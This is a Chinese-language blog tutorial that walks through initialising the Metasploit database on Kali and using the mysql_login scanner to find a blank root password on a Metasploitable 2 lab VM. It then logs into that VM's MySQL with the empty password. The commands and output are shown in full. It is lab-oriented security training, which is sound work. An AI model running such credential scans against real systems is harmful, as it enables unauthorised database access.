kali扫描metasploit2靶机上mysql服务的空密码_akong3916的博客-爱代码爱编程
kali扫描Metasploit2靶机上MySQL服务的空密码
实验环境
Linux kali 5.18.0-kali5-amd64
- kali嘛,到这里的都知道啦
Linux metasploitable 2.6.24-16-server
- metasploitable 是用于评估 metasploit 的靶机,是一个 Ubuntu-Linux 虚拟机,用于测试常见漏洞。
实验步骤
1、启动kail数据库
在kali中metasploit默认使用postgresql作为它的数据库
- 首先使用如下方式启动
启动数据库
方式1:
┌──(root㉿kali)-[~]
└─# systemctl start postgresql
方式2:
┌──(root㉿kali)-[~]
└─# /etc/init.d/postgresql start
方式3:
┌──(root㉿kali)-[~]
└─# service postgresql start
查看数据库启动状态
┌──(root㉿kali)-[~]
└─# systemctl status postgresql
开机自启数据库
┌──(root㉿kali)-[~]
└─# systemctl enable postgresql
2、初始化MSF数据库
- 若没有初始化,则creds会出现错误
msf6 auxiliary(scanner/mysql/mysql_login) > run
[+] 192.168.xxx.xxx:3306 - 192.168.xxx.xxx:3306 - Found remote MySQL version 5.0.51a
[!] 192.168.xxx.xxx:3306 - No active DB -- Credential data will not be saved!
[+] 192.168.xxx.xxx:3306 - 192.168.xxx.xxx:3306 - Success: 'root:'
[*] 192.168.xxx.xxx:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
无活动数据库,凭证将不会被保存。查看主机信息和凭证信息,数据库未连接
[!] 192.168.xxx.xxx:3306 - No active DB -- Credential data will not be saved!
在使用creds,hosts查看时会出现报错 数据库未连接
msf6 auxiliary(scanner/mysql/mysql_login) > creds
[-] Database not connected
msf6 auxiliary(scanner/mysql/mysql_login) > hosts
[-] Database not connected
[-] Database not connected
(1)初始化
- 进入msf
┌──(root㉿kali)-[~]
└─# msfconsole
msf6 auxiliary(scanner/mysql/mysql_login) > db_status
结果如下:
[*] postgresql selected, no connection
msf6 auxiliary(scanner/mysql/mysql_login) > msfdb init
结果如下:
[*] exec: msfdb init
[i] Database already started
[+] Creating database user ‘msf’
为新角色输入的口令:
再输入一遍:
[+] Creating databases ‘msf’
[+] Creating databases ‘msf_test’
[+] Creating configuration file ‘/usr/share/metasploit-framework/config/database.yml’
[+] Creating initial database schema
- 如果已经初始化过,就输入
msfdb reinit
可以看到生成配置文件
/usr/share/metasploit-framework/config/database.yml
可以另起窗口,进入数据库
┌──(root㉿kali)-[~]
└─# sudo -u postgres psql
psql (14.4 (Debian 14.4-1+b1))
输入 "help" 来获取帮助信息.
postgres=# \du
角色列表
角色名称 | 属性 | 成员属于
----------+--------------------------------------------+----------
msf | | {}
postgres | 超级用户, 建立角色, 建立 DB, 复制, 绕过RLS | {}
postgres=# \l
数据库列表
名称 | 拥有者 | 字元编码 | 校对规则 | Ctype | 存取权限
-----------+----------+----------+-------------+-------------+-----------------------
msf | msf | UTF8 | zh_CN.UTF-8 | zh_CN.UTF-8 |
msf_test | msf | UTF8 | zh_CN.UTF-8 | zh_CN.UTF-8 |
postgres | postgres | UTF8 | zh_CN.UTF-8 | zh_CN.UTF-8 |
template0 | postgres | UTF8 | zh_CN.UTF-8 | zh_CN.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | zh_CN.UTF-8 | zh_CN.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
(5 行记录)
- 回到msf,查看链接状态,如果还是未连接,退出msf,重新进入即可
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
完成初始化!
(2)kali 进入 msf ,利用模块进行扫描
- 搜索mysql_login模块
msf6 > search mysql_login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/mysql/mysql_login normal No MySQL Login Utility
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/mysql/mysql_login
msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) >
- 配置扫描数据
set rhosts 目标主机IP
set username root #我们配置要爆破的用户
set blank_passwords true #开启为所有用户尝试空密码
show options #查看配置信息
- 运行
run
或者exploit
msf6 auxiliary(scanner/mysql/mysql_login) > run
[+] 192.168.149.130:3306 - 192.168.149.130:3306 - Found remote MySQL version 5.0.51a
[+] 192.168.149.130:3306 - 192.168.149.130:3306 - Success: 'root:'
[*] 192.168.149.130:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
搜索完成
- 使用数据库进入命令,不指定密码,输入密码时回车进入
msf6 auxiliary(scanner/mysql/mysql_login) > mysql -h 192.168.149.130 -p
[*] exec: mysql -h 192.168.149.130 -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 21
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>show databases;
总结
哈哈哈哈,睡觉咯